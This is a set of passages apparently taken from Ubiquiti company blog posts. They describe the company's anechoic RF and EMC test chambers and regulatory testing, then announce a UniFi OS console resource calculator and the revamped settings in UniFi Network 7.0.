How much is 100 dB attenuation in practice? Consider a case with a tower-top macro LTE base station that has high-gain antennas at a distance of 5 m from the chamber. To get service inside the chamber, the phone needs at least -100 dBm signal level. With a typical equipment setup, the signal level remains below -100 dBm inside the chamber and there is no LTE service.

3 m Dome-Roofed Anechoic Chamber

Chamber 2: Frankonia SAC-3 Plus 3 m chamber with AmpliFi on the rotating measurement table

The other newly constructed chamber, the Frankonia SAC-3 Plus L (9.23 m x 6.53 m x 6.00 m), is a versatile, fully compliant Electromagnetic Compatibility (EMC) testing room. We use this chamber for emissions and immunity testing in parallel with the larger SAC-10 chamber.

The dome-shaped roof design combined with RF absorbers minimizes reflections and offers excellent measurement performance. The SAC-3 chamber provides over 110 dB isolation from the outside world. Similar to the larger chamber room, the fully automated test routines control the turntable and antenna height, as well as run the test equipment.

Anechoic — No Reflections

Electromagnetic waves are absorbed by the pyramid-shaped structures

Anechoic chambers provide significantly reduced reflections and external interference levels, making measurements repeatable and accurate.

Electromagnetic waves propagate, reflect, and refract differently depending on the frequency and surrounding structures. The following techniques are important for RF and anechoic chamber designs.

Design techniques for RF and anechoic chambers

While our chambers provide a drastic reduction in RF reflections, they are not intended to be completely anechoic by design (i.e. semi-anechoic).

Performing measurements in an anechoic chamber have certain unique consequences. Multiple-input, multiple-output (MIMO) technology used in Wi-Fi relies on multiple spatial signal paths created by reflections. Performance measurements, for example, throughput, require adding metallic RF-reflecting materials inside the chamber. Even in a perfect interference-free environment, in the absence of reflections and multipath propagation, Wi-Fi throughputs are low.

Control Room Hosts Test Equipment

Control room with test equipment

When a chamber’s door is closed, engineers work in the shielded control room with test equipment next to the chamber and oversee test progress. This eliminates any potential source of emissions from interfering with testing. Cameras inside the chamber help ensure the test setup remains intact with automated DUT position and antenna adjustments.

Accredited Accuracy, Shorter Time to Market

Governments heavily regulate RF, EMC, and safety testing. The Federal Communications Commission (FCC); Innovation, Science and Economic Development Canada (ISED); European Union directives (CE Mark), regulate RF devices and potential interference to licensed operations respectively for the US, Canada and European Union.

Since all regions and countries have their own regulations, the resulting testing effort for each new product is significant. The Salt Lake City lab’s new accreditation by the National Voluntary Laboratory Accreditation Program (NVLAP) of the National Institute of Standards and Technology (NIST) means our engineers can perform a broad range of performance and regulatory compliance tests quickly expediting product’s time-to-market.

These are the most common test requirements:

  • RF parameters
    • RF performance, limits, and requirements for transmitters
  • Radiated and conducted emissions
    • Limits unintentional emissions across various frequency bands and test mode
  • Radiated and conducted immunity
    • Test for product susceptibility to external radio energy, ensuring product reliability
  • Static discharge, surge, and fast transient immunity
    • Ensures that various magnitudes and types of voltage and current spikes can be withstood by the product without degradation of performance or abnormal behavior
  • Product safety
    • Tests to ensure international safety standards are met or exceeded to reduce the hazard to humans and the environment

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Discover Your Perfect Console with the New UniFi OS Resource Calculator

Your UniFi deployment is only as good as the planning behind it. There are two important questions to consider as you build your dream system and determine how to optimize its performance. The first is whether or not your equipment can be seamlessly integrated into your space. 

We have you covered there with our Design Center, the interactive visualization tool that allows you to map out a custom network uniquely suited for your location. Check out our brief video overview to learn more.

The UniFi product suite is vast, cohesive, and designed to be highly scalable so you can build and support networks of any size. That means you have myriad options when it comes to choosing your ideal devices, applications, and functionality, so we strongly recommend taking your time during the planning process. Once you’ve finalized your deployment, then comes the all-important follow-up question:

Do I have what I need to run all of this?

With that in mind, we’re very excited to introduce the UniFi OS Console Resource Calculator: a brand-new modal that not only provides console-specific processing and memory caps with a single click, but gives dynamic approximations of how well each console can support various deployment types.

Granularity is the name of the game with our new calculator. Our top priority is ensuring that every user can fully capture each component of their system so they know exactly what console is right for them. After selecting a console and the applications it will run, you have a wealth of customization options to help you specify how many devices you’re connecting, how they will function, and whether or not they will have advanced configurations.

As you make your adjustments, you’ll see how each console’s CPU and memory are impacted, helping you determine whether you’ve chosen the right model or you require one with higher specs. Take a look at the calculator in action in our April edition of Ubiquiti Insider:


Simplifying IT isn’t just about making networking technology more accessible and intuitive; it’s about giving users a deeper understanding of how their system works and what’s needed to support it. We’re very proud of this new innovation because it’s directly tied to our greatest pursuit: delivering the best system performance and user experience possible.

We really can’t wait for you to try the resource calculator, so take it for a spin here and let us know what you think on the Ubiquiti Community forum. Also, be sure to check back soon for more news on the ever-expanding world of UniFi!

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Ubiquiti UniFi Network 7.0 Introduces Revamped Settings to Simplify System Configuration

Comprehensive network customization has always been a touchstone of the UniFi Network application, and a guiding principle for our developers who work tirelessly to refine it. However, providing such an immense degree of user control can sometimes complicate our larger pursuit to simplify IT for every type of user. We want our settings to provide a wealth of options while also being easy to navigate and understand. Otherwise, network optimization is only possible for the most technically adept.

UniFi Network 7.0 resolves this tension by delivering a more intuitively organized dashboard and an enhanced search engine that makes it simpler than ever to locate the exact settings you need to support your unique deployment. We’ve also expanded automation options for many settings to deliver a more plug-and-play experience for new UniFi users setting up their systems for the first time.

Making network configuration more accessible is our top priority with the 7.0 release, but long-time users can rest assured that our advanced settings remain as robust as ever. In fact, we’ve made many key innovations, including network-specific multicast DNS settings, expanded data retention options, and more sophisticated configuration copying that even accounts for the specific outlet a device is plugged into. You’ll also be able to surf through these options with unprecedented speed as we’ve drastically lowered latency within the Settings menu.

In short, UniFi Network 7.0 is about making your network settings as unique as your deployment, in terms of functionality, navigability, and even aesthetic with the introduction of Light Mode and other dashboard enhancements. There’s so much more we could cover, but no rundown could compare to seeing these improvements yourself.

However, if you’d like to start by reviewing the release’s bug fixes, known issues, OS-specific installation details, or download links, you can find them all on the Ubiquiti Community forum. Once you’ve updated to 7.0 and had some time to explore, we’d love to hear about your experience on the forum as well!

This release marks a huge advancement of UniFi by making network management deeper and more accessible—but our work continues. To follow us on our journey, make sure to check this feed periodically for new content related to product announcements, innovations, tutorials, and more.

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